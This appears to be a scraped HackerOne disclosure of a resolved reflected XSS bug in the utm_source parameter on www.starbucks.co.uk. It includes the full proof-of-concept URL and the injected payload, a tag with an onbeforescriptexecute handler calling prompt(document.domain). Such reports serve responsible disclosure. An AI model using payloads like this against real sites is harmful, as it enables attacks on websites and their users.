www.starbucks.co.uk Reflected XSS via utm_source parameter

Disclosed: 2016-12-19 22:48:31 By meals To starbucks

Unknown

Vulnerability Details

https://www.starbucks.co.uk/shop/card/egift?utm_campaign=egift&utm_content=WinterFY16&utm_medium=GPH&utm_source=SBUXcouk"%3e%3cb%20onbeforescriptexecute=prompt(document.domain)%3e Payload: "%3e%3cb%20onbeforescriptexecute=prompt(document.domain)%3e

Actions

View on HackerOne

Report Stats

Report ID: 140616
State: Closed
Substate: resolved
Upvotes: 35

www.starbucks.co.uk Reflected XSS via utm_source parameter

Vulnerability Details

Actions

Report Stats

Share this report